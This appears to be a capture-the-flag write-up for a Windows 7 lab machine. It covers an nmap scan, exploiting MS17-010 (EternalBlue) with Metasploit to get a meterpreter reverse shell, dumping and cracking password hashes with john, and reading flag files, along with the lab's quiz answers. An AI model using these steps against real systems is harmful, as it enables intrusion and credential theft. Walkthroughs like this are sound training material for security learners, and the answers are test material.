# Nmap 7.80 scan initiated Fri Aug 21 21:08:36 2020 as: nmap -p- -sSVC -oA nmap_full -v 10.10.154.183 Nmap scan report for 10.10.154.183 Host is up (0.032s latency). Not shown: 65526 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? | rdp-ntlm-info: | Target_Name: JON-PC | NetBIOS_Domain_Name: JON-PC | NetBIOS_Computer_Name: JON-PC | DNS_Domain_Name: Jon-PC | DNS_Computer_Name: Jon-PC | Product_Version: 6.1.7601 |_ System_Time: 2020-08-21T19:10:56+00:00 | ssl-cert: Subject: commonName=Jon-PC | Issuer: commonName=Jon-PC | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-08-20T19:07:58 | Not valid after: 2021-02-19T19:07:58 | MD5: 28ea b5fa cada ea23 bc6f e60e 7dc0 fd8d |_SHA-1: 523e 8122 7947 f063 5f10 2406 61ba 2488 2269 c256 |_ssl-date: 2020-08-21T19:11:02+00:00; 0s from scanner time. 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Aug 21 21:11:02 2020 -- 1 IP address (1 host up) scanned in 146.04 seconds
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Answer:
ms17-010
Port 445 (SMB) is opened and SMBv1 seems enable with a default configuration.
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf5 > use 2 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) >
Show options and set the one required value. What is the name of this value? (All caps for submission)
Answer:
RHOSTS
We can use the options command to list the options and see which one is
required and not already filled.
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.98 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.154.183 RHOSTS => 10.10.154.183
But we also need to change the payload options to use the THM VPN interface:
1 2 3 4 5 6 7 8
$ ip addr show dev tun0 3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100 link/none inet 10.8.24.100/16 brd 10.8.255.255 scope global tun0 valid_lft forever preferred_lft forever
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.8.24.100 LHOST => 10.8.24.100
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Answer:
post/multi/manage/shell_to_meterpreter
There are many articles explaining
How to Upgrade Command Shell to Meterpreter
but it's not needed for us because we already have a meterpreter.
The exploit must have been updated since the room was created.
Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)
Answer:
SESSION
To answer the question we will need to put our meterpreter shell in background.
Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER true yes Start an exploit/multi/handler to receive the connection LHOST no IP of host that will receive the connection from the payload (Will try to auto detect). LPORT 4433 yes Port for payload to connect to. SESSION yes The session to run this module on.
If we didn't already had a meterpreter we could have specify the session
were we have a DOS shell to upgrade it to a meterpreter shell.
Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.8.24.100:4444 -> 10.10.154.183:49218 (10.10.154.183)
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
$ john --user=Jon --format=nt hash.txt --wordlist=/usr/share/wordlists/password/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (NT [MD4 128/128 AVX 4x3]) Warning: no OpenMP support for this hash type, consider --fork=2 Press 'q' or Ctrl-C to abort, almost any other key for status alqfna22 (Jon) 1g 0:00:00:02 DONE (2020-08-21 22:03) 0.4098g/s 4180Kp/s 4180Kc/s 4180KC/s alqueva1968..alpus Use the "--show --format=NT" options to display all of the cracked passwords reliably Session completed
We can see the password with:
1 2 3 4
$ john --user=Jon --format=nt hash.txt --show Jon:alqfna22:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter > pwd C:\ meterpreter > ls Listing: C:\ ============
Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2009-07-14 05:18:56 +0200 $Recycle.Bin 40777/rwxrwxrwx 0 dir 2009-07-14 07:08:56 +0200 Documents and Settings 40777/rwxrwxrwx 0 dir 2009-07-14 05:20:08 +0200 PerfLogs 40555/r-xr-xr-x 4096 dir 2009-07-14 05:20:08 +0200 Program Files 40555/r-xr-xr-x 4096 dir 2009-07-14 05:20:08 +0200 Program Files (x86) 40777/rwxrwxrwx 4096 dir 2009-07-14 05:20:08 +0200 ProgramData 40777/rwxrwxrwx 0 dir 2018-12-13 04:13:22 +0100 Recovery 40777/rwxrwxrwx 4096 dir 2018-12-13 00:01:17 +0100 System Volume Information 40555/r-xr-xr-x 4096 dir 2009-07-14 05:20:08 +0200 Users 40777/rwxrwxrwx 16384 dir 2009-07-14 05:20:08 +0200 Windows 100666/rw-rw-rw- 24 fil 2018-12-13 04:47:39 +0100 flag1.txt 0000/--------- 58066832 fif 1971-11-04 18:16:00 +0100 hiberfil.sys 0000/--------- 58066832 fif 1971-11-04 18:16:00 +0100 pagefile.sys
meterpreter > cat flag1.txt flag{REDACTED}
Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
Answer:
sam_database_elevated_access
The SAM database is stored in C:\windows\system32\config, in this directory
we can see a flag file.
meterpreter > dir Documents Listing: Documents ==================
Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2018-12-13 04:13:31 +0100 My Music 40777/rwxrwxrwx 0 dir 2018-12-13 04:13:31 +0100 My Pictures 40777/rwxrwxrwx 0 dir 2018-12-13 04:13:31 +0100 My Videos 100666/rw-rw-rw- 402 fil 2018-12-13 04:13:45 +0100 desktop.ini 100666/rw-rw-rw- 37 fil 2018-12-13 04:49:18 +0100 flag3.txt